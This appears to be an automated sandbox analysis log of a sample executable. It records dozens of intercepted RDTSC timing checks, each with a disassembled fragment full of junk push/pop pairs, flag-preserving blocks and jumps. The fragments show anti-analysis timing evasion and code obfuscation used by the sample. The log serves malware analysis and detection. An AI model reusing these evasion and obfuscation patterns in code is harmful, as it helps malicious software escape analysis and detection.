Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A015E second address: 70A017C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a mov di, ax 0x0000000d mov si, BA2Fh 0x00000011 popad 0x00000012 mov esi, dword ptr [775606ECh] 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A017C second address: 70A0180 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0180 second address: 70A0197 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4DE8CD3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0197 second address: 70A0215 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007FBCC4EB33ABh 0x0000000b adc esi, 25ED7E1Eh 0x00000011 jmp 00007FBCC4EB33B9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a test esi, esi 0x0000001c pushad 0x0000001d mov ax, DF83h 0x00000021 pushfd 0x00000022 jmp 00007FBCC4EB33B8h 0x00000027 add al, 00000048h 0x0000002a jmp 00007FBCC4EB33ABh 0x0000002f popfd 0x00000030 popad 0x00000031 jne 00007FBCC4EB428Ah 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FBCC4EB33B0h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0215 second address: 70A0219 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0219 second address: 70A021F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A021F second address: 70A024B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4DE8CCEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBCC4DE8CD7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A024B second address: 70A02D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4EB33B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FBCC4EB33B7h 0x00000011 adc eax, 6FAA7DAEh 0x00000017 jmp 00007FBCC4EB33B9h 0x0000001c popfd 0x0000001d mov edi, ecx 0x0000001f popad 0x00000020 xchg eax, edi 0x00000021 pushad 0x00000022 push ecx 0x00000023 mov edx, 14A62A1Ah 0x00000028 pop edi 0x00000029 mov ax, EF27h 0x0000002d popad 0x0000002e call dword ptr [77530B60h] 0x00000034 mov eax, 756AE5E0h 0x00000039 ret 0x0000003a jmp 00007FBCC4EB33AAh 0x0000003f push 00000044h 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007FBCC4EB33AAh 0x0000004a rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A02D3 second address: 70A02E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4DE8CCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A02E2 second address: 70A02E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A02E8 second address: 70A0334 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 pushad 0x0000000a call 00007FBCC4DE8CCDh 0x0000000f mov cx, 9AE7h 0x00000013 pop esi 0x00000014 movsx edx, si 0x00000017 popad 0x00000018 xchg eax, edi 0x00000019 pushad 0x0000001a mov ax, C571h 0x0000001e popad 0x0000001f push eax 0x00000020 jmp 00007FBCC4DE8CCAh 0x00000025 xchg eax, edi 0x00000026 jmp 00007FBCC4DE8CD0h 0x0000002b push dword ptr [eax] 0x0000002d pushad 0x0000002e mov edx, eax 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A03A2 second address: 70A03A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A03A8 second address: 70A03AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A03AC second address: 70A03D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FBD352F269Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FBCC4EB33B9h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A03D7 second address: 70A03DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A03DB second address: 70A03E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A03E1 second address: 70A0473 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4DE8CCCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b jmp 00007FBCC4DE8CD1h 0x00000010 mov dword ptr [esi], edi 0x00000012 pushad 0x00000013 mov ecx, 43CB11A3h 0x00000018 pushfd 0x00000019 jmp 00007FBCC4DE8CD8h 0x0000001e adc cx, E6E8h 0x00000023 jmp 00007FBCC4DE8CCBh 0x00000028 popfd 0x00000029 popad 0x0000002a mov dword ptr [esi+04h], eax 0x0000002d jmp 00007FBCC4DE8CD6h 0x00000032 mov dword ptr [esi+08h], eax 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 mov ax, bx 0x0000003b jmp 00007FBCC4DE8CD9h 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0473 second address: 70A0483 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBCC4EB33ACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0483 second address: 70A049A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+0Ch], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FBCC4DE8CCAh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A049A second address: 70A04DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4EB33ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+4Ch] 0x0000000c pushad 0x0000000d jmp 00007FBCC4EB33B4h 0x00000012 mov eax, 63A21C81h 0x00000017 popad 0x00000018 mov dword ptr [esi+10h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FBCC4EB33B3h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A04DF second address: 70A0507 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4DE8CD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+50h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov eax, ebx 0x00000011 push edx 0x00000012 pop eax 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0507 second address: 70A0522 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBCC4EB33B7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0522 second address: 70A054A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4DE8CD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+14h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A054A second address: 70A055D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4EB33AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A055D second address: 70A0563 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0563 second address: 70A0567 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0567 second address: 70A05D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+54h] 0x0000000b pushad 0x0000000c push edx 0x0000000d mov dx, ax 0x00000010 pop esi 0x00000011 mov edi, 32324C48h 0x00000016 popad 0x00000017 mov dword ptr [esi+18h], eax 0x0000001a pushad 0x0000001b mov si, di 0x0000001e push edx 0x0000001f mov eax, 418650DBh 0x00000024 pop esi 0x00000025 popad 0x00000026 mov eax, dword ptr [ebx+58h] 0x00000029 pushad 0x0000002a mov esi, ebx 0x0000002c pushfd 0x0000002d jmp 00007FBCC4DE8CD9h 0x00000032 or al, 00000016h 0x00000035 jmp 00007FBCC4DE8CD1h 0x0000003a popfd 0x0000003b popad 0x0000003c mov dword ptr [esi+1Ch], eax 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007FBCC4DE8CCDh 0x00000046 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A05D5 second address: 70A065D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4EB33B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+5Ch] 0x0000000c pushad 0x0000000d mov bx, cx 0x00000010 popad 0x00000011 mov dword ptr [esi+20h], eax 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FBCC4EB33ABh 0x0000001b or ah, FFFFFFAEh 0x0000001e jmp 00007FBCC4EB33B9h 0x00000023 popfd 0x00000024 movzx ecx, di 0x00000027 popad 0x00000028 mov eax, dword ptr [ebx+60h] 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FBCC4EB33B9h 0x00000032 or eax, 28825D96h 0x00000038 jmp 00007FBCC4EB33B1h 0x0000003d popfd 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A065D second address: 70A0661 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0661 second address: 70A06E6 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FBCC4EB33ACh 0x00000008 or ax, 45B8h 0x0000000d jmp 00007FBCC4EB33ABh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 mov dword ptr [esi+24h], eax 0x00000019 pushad 0x0000001a mov esi, 7697360Bh 0x0000001f pushfd 0x00000020 jmp 00007FBCC4EB33B0h 0x00000025 sub ecx, 13000018h 0x0000002b jmp 00007FBCC4EB33ABh 0x00000030 popfd 0x00000031 popad 0x00000032 mov eax, dword ptr [ebx+64h] 0x00000035 jmp 00007FBCC4EB33B6h 0x0000003a mov dword ptr [esi+28h], eax 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007FBCC4EB33B7h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A06E6 second address: 70A06FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBCC4DE8CD4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A06FE second address: 70A0754 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+68h] 0x0000000b jmp 00007FBCC4EB33B7h 0x00000010 mov dword ptr [esi+2Ch], eax 0x00000013 jmp 00007FBCC4EB33B6h 0x00000018 mov ax, word ptr [ebx+6Ch] 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f call 00007FBCC4EB33ADh 0x00000024 pop ecx 0x00000025 mov edi, 21D3A974h 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0754 second address: 70A076B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, di 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov word ptr [esi+30h], ax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 mov edx, 2D0B4A10h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A076B second address: 70A0802 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FBCC4EB33B9h 0x00000008 xor eax, 46C7A896h 0x0000000e jmp 00007FBCC4EB33B1h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushfd 0x00000017 jmp 00007FBCC4EB33B0h 0x0000001c xor al, FFFFFFB8h 0x0000001f jmp 00007FBCC4EB33ABh 0x00000024 popfd 0x00000025 popad 0x00000026 mov ax, word ptr [ebx+00000088h] 0x0000002d jmp 00007FBCC4EB33B6h 0x00000032 mov word ptr [esi+32h], ax 0x00000036 pushad 0x00000037 mov eax, 79BA63ADh 0x0000003c jmp 00007FBCC4EB33AAh 0x00000041 popad 0x00000042 mov eax, dword ptr [ebx+0000008Ch] 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b mov di, A48Ch 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0802 second address: 70A0808 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0808 second address: 70A080C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A080C second address: 70A081D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+34h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A081D second address: 70A0832 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4EB33B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0832 second address: 70A0838 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0838 second address: 70A08A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+18h] 0x0000000b jmp 00007FBCC4EB33AFh 0x00000010 mov dword ptr [esi+38h], eax 0x00000013 pushad 0x00000014 mov eax, 2C30CE9Bh 0x00000019 pushfd 0x0000001a jmp 00007FBCC4EB33B0h 0x0000001f sbb ax, C968h 0x00000024 jmp 00007FBCC4EB33ABh 0x00000029 popfd 0x0000002a popad 0x0000002b mov eax, dword ptr [ebx+1Ch] 0x0000002e pushad 0x0000002f movzx esi, di 0x00000032 push edi 0x00000033 mov ebx, eax 0x00000035 pop ecx 0x00000036 popad 0x00000037 mov dword ptr [esi+3Ch], eax 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FBCC4EB33B2h 0x00000041 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A08A1 second address: 70A08B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBCC4DE8CCEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A08B3 second address: 70A08DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4EB33ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+20h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FBCC4EB33B5h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A08DE second address: 70A08FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4DE8CD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+40h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A08FC second address: 70A0900 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0900 second address: 70A0913 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4DE8CCFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0913 second address: 70A0919 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0919 second address: 70A091D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A091D second address: 70A0933 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebx+00000080h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov bl, ch 0x00000013 mov ecx, edx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0933 second address: 70A0939 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0939 second address: 70A093D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A093D second address: 70A0941 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0941 second address: 70A0952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000001h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0952 second address: 70A0957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0957 second address: 70A098D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4EB33B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBCC4EB33B7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A098D second address: 70A09A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBCC4DE8CD4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A09A5 second address: 70A09A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0A3E second address: 70A0A43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0A43 second address: 70A0A58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBCC4EB33B1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0A58 second address: 70A0A5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0A5C second address: 70A0A7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007FBD352F2005h 0x0000000e pushad 0x0000000f popad 0x00000010 mov eax, dword ptr [ebp-0Ch] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FBCC4EB33AEh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0A7F second address: 70A0A91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBCC4DE8CCEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0A91 second address: 70A0AA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0AA2 second address: 70A0AA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0AA6 second address: 70A0AAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0AAA second address: 70A0AB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0AB0 second address: 70A0AF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4EB33ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+78h] 0x0000000c jmp 00007FBCC4EB33B6h 0x00000011 push 00000001h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FBCC4EB33B7h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0AF3 second address: 70A0AF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0AF9 second address: 70A0B66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4EB33ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007FBCC4EB33B6h 0x00000011 push eax 0x00000012 pushad 0x00000013 jmp 00007FBCC4EB33B1h 0x00000018 movzx ecx, di 0x0000001b popad 0x0000001c nop 0x0000001d jmp 00007FBCC4EB33B3h 0x00000022 lea eax, dword ptr [ebp-08h] 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FBCC4EB33B5h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0B66 second address: 70A0B76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBCC4DE8CCCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0B76 second address: 70A0B9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4EB33ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FBCC4EB33B0h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0B9C second address: 70A0BA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0BA2 second address: 70A0BC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4EB33AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBCC4EB33AEh 0x00000011 rdtsc
